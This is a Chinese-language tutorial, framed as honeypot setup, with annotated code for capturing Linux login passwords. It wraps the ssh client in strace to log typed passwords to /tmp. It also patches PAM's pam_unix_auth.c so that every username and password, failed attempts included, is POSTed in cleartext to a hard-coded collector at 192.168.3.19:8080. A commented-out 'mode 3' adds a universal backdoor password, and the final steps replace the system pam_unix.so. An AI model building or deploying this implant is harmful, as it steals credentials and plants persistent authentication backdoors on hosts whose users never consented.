linux 密码记录(client/server)


以下内容我都只用于搭建蜜罐(honeypot)。注意:这些改动会把用户输入的密码明文记录/外发,mode3 更是一个万能后门口令,放到任何非蜜罐系统上都等同于植入后门。

记录ssh密码(alias)

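# Wrap the ssh client in strace so its read/write/connect syscalls -- which carry
# the typed password -- are logged to a per-invocation file under /tmp.
# Changes vs. the original alias:
#  - $(...) replaces backticks nested inside single quotes; the original only
#    worked because the inner quotes happened to split the string harmlessly.
#  - The log is created under umask 077. strace -o otherwise creates the file
#    with the caller's default umask (typically 0644), which would let any local
#    user read every captured password.
#  - A function instead of an alias so "$@" is forwarded inside the subshell;
#    the subshell scopes the umask change and exec's strace so the tty is
#    handed to ssh exactly as before. strace resolves `ssh` via PATH, so the
#    function does not recurse.
ssh() {
    (
        umask 077
        exec strace -o "/tmp/.sshpwd-$(date +%d%h%m%s).log" \
            -e trace=read,write,connect -s 2048 ssh "$@"
    )
}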

修改pam进行密码记录

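# Find the installed PAM version and fetch the matching upstream source: the
# rebuilt pam_unix.so must come from the same version as the one on the system.
# (Debian-based hosts: dpkg -l | grep -i pam)
rpm -qa | grep -i pam
# NOTE(review): plain-HTTP download with no integrity check. This source ends up
# in the host's authentication stack, so verify the tarball against a checksum
# or signature published by the upstream project before building it.
wget http://ftp.naist.jp/pub/linux/libs/pam/library/Linux-PAM-1.1.1.tar.gz
# Single-step extraction (replaces the separate gzip -d + tar xvf).
tar xzf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1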

编辑文件pam_unix_auth.c

#vim modules/pam_unix/pam_unix_auth.c 
#在文件头部加入以下 #include(socket/connect、sockaddr_in、gethostbyname 所需)

#include <sys/socket.h> /* socket, connect */
#include <netinet/in.h> /* struct sockaddr_in, struct sockaddr */
#include <netdb.h> /* struct hostent, gethostbyname */

#在第177行(紧接 D(("user=%s, password=[%s]", name, p)) 调试宏之后、_unix_verify_password 校验之前)插入以下代码。因为记录发生在校验之前,所有输入的密码——包括登录失败时输入的错误密码——都会被记录,请注意。行号 177 仅对 Linux-PAM-1.1.1 有效,其他版本请按上述位置自行定位。
    /*
     * Honeypot hook spliced into pam_sm_authenticate() in pam_unix_auth.c.
     * It runs before _unix_verify_password(), so every password offered for
     * `name` -- correct or not -- passes through here. `name`, `p`, `pamh`,
     * `ctrl` and `retval` are declared earlier in the enclosing function
     * (outside this excerpt); `p` is assumed to be non-NULL at this point.
     *
     * Review notes (code below left exactly as published):
     *  - `name` and `p` come from the login attempt, i.e. from an untrusted,
     *    possibly remote, party. sprintf() into the fixed 1024-byte `message`
     *    is unbounded; unless something upstream caps their length (not
     *    visible here -- confirm), a long username/password overwrites the
     *    stack of the authenticating process (sshd, login, sudo, ...).
     *  - mode 1 ships the password in cleartext over HTTP and also printf()s
     *    it to the process's stdout.
     *  - The collector address/port and the URL format are hard-coded.
     */
    /* PAM's debug macro; presumably only emits when built with debugging, but
     * when it does, it logs the cleartext password. */
    D(("user=%s, password=[%s]", name, p));
    /*  mode 1  */
    /* mode 1: POST "u=<user>&p=<password>" to a collector at host:portno. */
    int portno =        8080;
    char *host =        "192.168.3.19";
    char *message_fmt = "POST /u=%s&p=%s HTTP/1.0\r\n\r\n";
    struct hostent *server;
    struct sockaddr_in serv_addr;
    int sockfd, bytes, sent, received, total;
    char message[1024],response[4096];
    /* BUG: unbounded write into message[] from untrusted name/p (see header).
     * Minimal fix: snprintf(message, sizeof message, ...) plus a truncation
     * check. Note also that '&', '=' and spaces in name/p are not encoded. */
    sprintf(message,message_fmt,name,p);
    /* Echoes username+password to stdout of the authenticating process -- on
     * an interactive login that is likely the user's own terminal, which both
     * leaks the password and reveals the hook. */
    printf("Request:\n%s\n",message);
    sockfd=socket(AF_INET,SOCK_STREAM,0);   /* return value never checked */
    /* Return value never checked: if resolution fails, `server` is NULL and the
     * memcpy below dereferences it, crashing the authenticating process. */
    server = gethostbyname(host);
    memset(&serv_addr,0,sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(portno);
    memcpy(&serv_addr.sin_addr.s_addr,server->h_addr,server->h_length);
    /* A failed connect is only printed; execution falls through and write()s
     * on the unconnected socket anyway. */
    if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
        printf("ERROR connecting");

    /* send the request */
    /* Send loop. BUG: when write() returns -1 the error is printed but the
     * loop neither breaks nor checks errno; `sent` goes negative and the loop
     * keeps retrying for as long as the write keeps failing. A write on a
     * broken connection may also raise SIGPIPE in the calling process. */
    total = strlen(message);
    sent = 0;
    do {
        bytes = write(sockfd,message+sent,total-sent);
        if (bytes < 0)
            printf("ERROR writing message to socket");
        if (bytes == 0)
            break;
        sent+=bytes;
    } while (sent < total);
    /* Response buffer is prepared but never read, and `sockfd` is never
     * closed: one leaked descriptor per authentication attempt in the
     * calling process. */
    memset(response,0,sizeof(response));
    total = sizeof(response)-1;
    received = 0;
    /* mode1  */
    /* mode2 */
    /* mode 2 (disabled): append the password to a local file instead.
     * BUG as written: fwrite(&p, ...) writes 2*strlen(p) bytes starting at the
     * address of the pointer variable `p` -- stack contents, not the password
     * -- and reads out of bounds; the intended call is
     * fwrite(p, 1, strlen(p), fp). Also, "w+" truncates the file on every
     * authentication, so only the most recent password is retained ("a" would
     * append), and the file's permissions depend on the process umask. */
    // FILE *fp = fopen("/var/log/aaa111","w+");
    // if(fp != NULL) {
        // fwrite(&p,strlen(p),2,fp);
        // fclose(fp);
    // }
    /* mode2 */

    /* verify the password of this user */
    /* Original pam_unix check; everything above ran before the password was
     * verified, which is why failed attempts are captured too. */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    /* mode3 */
    /* mode 3 (disabled): a universal backdoor -- this fixed string overrides
     * the real verification result and returns PAM_SUCCESS for *any* account
     * handled by pam_unix. Whether the login ultimately succeeds also depends
     * on the other modules in the PAM stack (not visible here). Outside a
     * honeypot this is a backdoor, not a logging aid. */
    // if(strcmp(p,"backdoorpassword")==0){retval=PAM_SUCCESS;}
    /* mode3 */

    /* Original pam_unix code: drop the local references to user and password. */
    name = p = NULL;

编译并替换系统中的 pam_unix.so。替换前务必备份原文件并保持一个 root 会话不退出:pam_unix.so 出问题会导致所有登录方式(login、sshd、sudo、su)全部失败。

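# Build the patched module and install it over the system pam_unix.so.
# WARNING: a faulty pam_unix.so breaks every authentication path on the host
# (login, sshd, sudo, su). Keep a root shell open and confirm that a fresh
# login works before closing it.
./configure && make
ls -la modules/pam_unix/.libs/

# 32-bit systems. The original listing overwrote the module here with no
# backup; keep the pristine copy as pam_unix.so.1 first so it can be restored.
# cp -n refuses to clobber an existing backup if this is run a second time.
cp -n /lib/security/pam_unix.so /lib/security/pam_unix.so.1
# --remove-destination (GNU cp) unlinks the old file instead of truncating it
# in place; rewriting a shared object that running processes have mapped can
# crash them.
cp -f --remove-destination modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so

# 64-bit systems: same steps under /lib64.
cp -n /lib64/security/pam_unix.so /lib64/security/pam_unix.so.1
cp -f --remove-destination modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so

# Rollback -- run only to revert. The original listing ended with this command
# unconditionally, which would undo the install if the whole block were pasted
# as one script. 32-bit hosts: use /lib/security instead.
# cp -f --remove-destination /lib64/security/pam_unix.so.1 /lib64/security/pam_unix.so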

在 CentOS 和 Debian 上测试可用。模块路径因发行版和架构而异(上文给出的是 /lib/security 与 /lib64/security),替换前请先用 find / -name pam_unix.so 确认实际位置。

代码引用